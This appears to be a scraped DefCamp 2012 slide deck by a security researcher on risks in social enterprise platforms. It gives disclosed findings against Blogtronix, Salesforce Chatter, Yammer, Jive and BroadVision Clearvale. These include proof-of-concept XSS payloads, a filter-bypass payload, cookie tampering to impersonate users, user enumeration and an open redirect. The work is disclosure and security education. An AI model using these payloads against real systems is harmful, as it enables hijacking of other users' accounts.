Social Enterprise Rises! …and so are the Risks - DefCamp 2012

Social Enterprise Software Rises!
…and so are the Risks

Marian Ventuneac
marian.ventuneac@gmail.com
@mventuneac

About myself

 Security Architect
 International presenter
 Member of OWASP and ISACA global organizations
 OWASP Ireland Limerick Chapter Leader
https://www.owasp.org/index.php/Ireland-Limerick

 Security Researcher PhD, MEng
http://www.ventuneac.net
http://secureappdev.blogspot.com
http://dcsl.ul.ie

2
An Introduction to Web Application Security Risks

Agenda

 Social Enterprise Software: What, Why, and How?

 Social Enterprise Software & Risks

 Thoughts on Calculated Risk

 Social Enterprise Software & Risks (some case studies)

 Final Thoughts

3

Social Enterprise Software: What?

 Social Enterprise/Social Enterprise Networks/Social
Enterprise Software

 Enterprise solutions providing Facebook-like social
networking functionality

‘social networking’ + ‘enterprise software’ =
‘social enterprise networking’

4

Social Enterprise Software: Why?

 Improve communication an increase work efficiency
 internal collaboration
 establish teams, communities or informal groups
 share knowledge and learn from other people experiences
 social networking
 external collaboration with partners
…

 Used by employees and external customers, suppliers,
partners

5

Social Enterprise Software: Deployment models

 On-premise solutions
 Deployed inside the enterprise network, usually controlled and
managed by the client

 Public Cloud-based solutions
 Software as a Service (SaaS) - Hosted and administered by the
vendor

 Hybrid deployments

 Usually open to allow external collaboration
 customers, suppliers, third-party contractors, etc

6

Social Enterprise Software: Some of the Risks

 Potential loss of enterprise data
 Understand what type of data needs to be uploaded there
 Do you know/control what data is actually being shared?

 Exploitation of common application vulnerabilities

 Phishing attacks, social engineering

 Viruses and malware

 Cloud-based solutions – various compliance and security
concerns
 Do you know where is your data stored?
7

Common Strategies for Risk Mitigation

 Vendor/supplier due diligence
 Security policies (generic/dedicated)
 Security processes & procedures
 Control the data being shared (data classification)

 Verify identity of users accessing the data (authentication)

 Control user access to data

 Approve/Create/Lock user accounts (accounts management)

 Remote wipe (for mobile devices – smartphone, tablets, etc)

…
8

Calculated Risks

9

Calculated Risks (cont)

 Business requirement:
WE (the company) need social enterprise software X for Y and Z
reasons.

 IT Security (most likely take on it):
 Scenario 1: No, there is to much risk to take!
 Scenario 2: Yes - We trust our partners and their choices.
 Scenario 3: Yes - IF Business ASSUMES ALL THE RISKS…
 Scenario 4: Let’s take a closer look at it…
 Scenario 5: Yes - the vendor is big enough and we can trust it
(= the vendor takes application security seriously)
10

Let’s Take a Closer Look

 Software defects leading to exploitation of security
vulnerabilities
 OWASP Top 10 Security Risks
 CVE/SANS Top 25 Programming Errors

 Vendor size – a plus, but doesn‘t guarantee the chosen
solution is vulnerability free
 It is safe to assume there is no application 100% secure
 If anyone claims such a thing, can they provide
reasonable proof?


Let’s Take a Closer Look (cont)

 Trust but verify
 Reach an agreement to test the chosen solution in a suitable
environment (ideally prior of any contracts being signed)
 Manual security testing
 Automated security testing
 Responsible disclosure

 Most likely you will not be
disappointed 


The Closer Look (cont)

 A practical take on assessing security of social
enterprise software solutions
 Some of the chosen ones


The Closer Look (cont)

 Assessment criteria including tests for
 Cross-Site Scripting (XSS)
 Insecure Direct Object Reference
 Security Missconfiguration
 Failure to Restrict URL Access
 Unvalidated Redirects and Forwards
 Logical Flaws
…


Blogtronix Enterprise

 Blogtronix Enterprise v4.0.4179 (on-premise) and SaaS
 CVE-2011-1039 - Multiple XSS Vulnerabilities
 Persistent (partially) XSS via Search functionality (auth. user)
HTTP request:

http://test_site/Home/pages/search/?search=
<script>alert(document.cookie)</script>
&sub=1&tab=0

HTTP response:

…
<a href="/Home/pages/search/?search=%3cscript
%3ealert(document.cookie)%3b&sub=1
&tab=0"> <script>alert(docume...</a>
</span> <span style=“
…


Blogtronix Enterprise (cont)

 CVE-2011-1039 - Multiple XSS Vulnerabilities
 Reflected XSS in login
page via arbitrary parameter

HTTP request:
https://test_site/pages/login/?a"'>
<script>alert(document.cookie)</script>

HTTP response:
<form method="post" action="/pages/login/?
a"'><script>alert(document.cookie)</script>"
id="aspnetForm">

 Multiple Reflected XSS
via existing and arbitrary
parameters of existing
resources



 Insecure Direct Object Reference (variant)
 Valid user A can potentially impersonate another user B

 Tamper value of userAccountID_http://test_site/ cookie (ASP.NET
GUID)

1. At login time - replace value of
userAccountID_ cookie with the
one matching user B

2. Do something noticeable
(post a message in group X)
& log out

3. As authenticated user A, review
user recent B’s activity – user B
appears as a recent visitor of group X


 Security Missconfiguration
 Enumerate valid user IDs
 Unauthenticated attacker checks for
https://test_site/users/user_id

 if user_id exists, redirected to login

 if not, display custom error

 Enumerate valid groups
 Unauthenticated attacker checks for
https://test_site/group_id/pages/people/

 if group_id exists, redirected to login

 if not, display custom error


 Improper Error Handling



 CVE-2011-1040 Unvalidated Redirects
https://test_site/pages/login/?ReturnUrl=http%3a%2f%2fwww.google.co.uk%2f

 Once the user logs in, he/she gets redirected to the resource
previously stated via ReturnUrl parameter

 CVE-2011-1041 Failure to restrict access to protected
resources
 Attacker knows hashed user ID
and name of uploaded file =>
file can be accessed without auth.
 Attacker knows hashed user ID
=> user profile picture can be
accessed without auth.


Salesforce Chatter SaaS

 Multiple persistent XSS vulnerabilities
 via user profile first &
last name
<a href="/005D00000022Ouw" class=
"entityLink" title="Adam"
onmouseover="alert(1)" Cole">
Adam" onmouseover="alert(1)&
quot; Cole</a>

 via group name
<a href="/0F9D0000000PPwz" class=
"entityLink" title="test_group"
onmouseover="alert(3)"">test_group&
quot; onmouseover="alert(3)"</a>


Salesforce Chatter SaaS (cont)

 Improper User Input Validation
 File Sharing - CR LF symbols accepted into file title

(via SaaS solution) POST /mobile/direct/23.0/
005D0000001yD7B/feed_items.json HTTP/1.1
Host: eu1.salesforce.com
…
Content-Disposition: form-data; name="title”
arv_test52%0a%0d%0a


Salesforce Chatter Desktop

 Improper Error Handling leading to Information Disclosure
 submitting comments for inexistent posts
HTTP POST request: /mobile/direct/23.0/0D5D00000000000/comments.json HTTP/1.1

Error: {"status":404,"msg":"NoDataFoundException: ORA-20001: nORA-06512: at
"DOPEY.CFEEDCOMMENT", line 149nORA-06512: at "DOPEY.CFEEDCOMMENT", line
253nORA-06512: at line 1n: {call cFeedComment.insert_feedcomments(?,?,?,?,?,?,?,?,?,?,?,?,?)})}"}

 attempting to ‘like’ and inexistent post
HTTP POST request: /mobile/direct/23.0/0D5D00000000000/like.json HTTP/1.1

Error: {"status":404,"msg":"NoDataFoundException: ORA-20001: nORA-06512: at
"DOPEY.CFEEDLIKE", line 156nORA-06512: at "DOPEY.CFEEDLIKE", line 217nORA-06512: at
"DOPEY.CFEEDLIKE", line 118nORA-06512: at line 1n: {call
cFeedLike.insert_detail(?,?,?,?,?,?,?,?)})}"}


Yammer

 Persistent XSS via group name
HTTP POST request:

/ventuneac.net/groups HTTP/1.1
Host: www.yammer.com
…
-----------------------------295562556131627
Content-Disposition: form-data; name="group[name]"
a4" onmouseover="alert(4)"
-----------------------------295562556131627

HTTP response (home page):

GET /ventuneac.net/ HTTP/1.1
Host: www.yammer.com
…
<a href="/ventuneac.net/groups/a4onmouseoveralert4"
class="nav-list-link" title="a4" onmouseover="alert(4)" group">


Jive

 Persistent XSS via group name (create/edit)
HTTP POST request:

POST /create-group.jspa HTTP/1.1
Host: ventuneac.jiveon.com
…
-----------------------------215202979014924
Content-Disposition: form-data; name="description"
group2"><script>alert(1)</script>
-----------------------------215202979014924

HTTP response (load group from Places):

GET /groups/group2 HTTP/1.1
Host: ventuneac.jiveon.com
…
<meta name="description" content="group2">
<script>alert(1)</script>" />


BroadVision Clearvale SaaS

 Multiple persistent XSS vulnerabilities
 via user profile first &
last name & search page
<a href="http://vmarian.clearvale.com/pg/profile/3"
rel="me" . title="m"
style="xss:expr/*XSS*/ession(
document.location('http://www.google.co.uk'))">
m" style="xss:expr/*XS...</a>

 via group name & search page
<a href="http://vmarian.clearvale.com/pg/groups/
23/aaaa-stylexssexprxssessiondocumentlocation
httpwwwgooglecouk/" title="aaa">
<a style="xss:expr/*XSS*/ession(
document.location('http://www.google.co.uk'))">
aaa"><a style="xss:exp...</a>


BroadVision Clearvale SaaS (cont)

 The broken fix for user profile name XSS issue
 Black-list user input validation
style followed by = becomes style00 (style=, style =, etc)
document.location followed by ( becomes document.location00
alert followed by ( becomes 00
/* becomes /0*
for first instance only
*/ becomes *0/
…

 Improper output escaping


BroadVision Clearvale SaaS (cont)

 The broken fix for user profile name XSS issue
 Bypassing Clearvale XSS filter

XSS payload:

firstname: m” style
lastname: ="/**/;xss:expr/**/ession(alert/**/('aaa'))

HTTP response:

…
<a href="http://vmarian.clearvale.com/pg/profile/3"
rel="me" . title="m" style ="/0**0/;xss:expr/**/ession(alert/**/('aaa')) ">m" style
="/0**0/;xss:...</a>


Knowing What ‘private’ Really Means

 Social Enterprise Software usually provides document
sharing/publishing functionality
 Private (not shared with anyone – default option)
 Shared with private (locked) groups/members
 Shared with public groups
 Shared with everyone (shared via public link)

 In certain conditions, the private documents can
become… less private 


AntiVirus & anti-malware file scanning

BroadVision Clearvale has a built-in AV scanning engine

The rest of tested solutions currently lack such capabilities

Yammer and Salesforce plan to add AV file scanning

No malicious files were used for testing AV capabilities


The Closer Look: Summary

Common security vulnerabilities - can be easily exploited

User shared information is not properly validated and
sanitised
 A malicious user can inject JavaScript malware into his/her
profile/groups/actions/etc
 Where such user controlled data is seen/accessed by other
users, their accounts can easily get compromised

Exploitation of such vulnerabilities could severely
compromise security of enterprise data


Final Thoughts

Even if the vendor is a market leader, it doesn’t
necessarily mean they get application security right

Dare to ask for proofs of application security 

Trust but verify

Vendor due diligence, social enterprise software related
security policies & security procedures, etc

Interested on this kind of benchmarks?
OWASP Security Baseline Project
https://www.owasp.org/index.php/OWASP_Security_Baseline_Project


Thank You
marian.ventuneac@gmail.com
@mventuneac

Social Enterprise Rises! …and so are the Risks - DefCamp 2012

Recommended

Recommended

More Related Content

What's hot

What's hot (20)

Viewers also liked

Viewers also liked (8)

Similar to Social Enterprise Rises! …and so are the Risks - DefCamp 2012

Similar to Social Enterprise Rises! …and so are the Risks - DefCamp 2012 (20)

More from DefCamp

More from DefCamp (20)

Social Enterprise Rises! …and so are the Risks - DefCamp 2012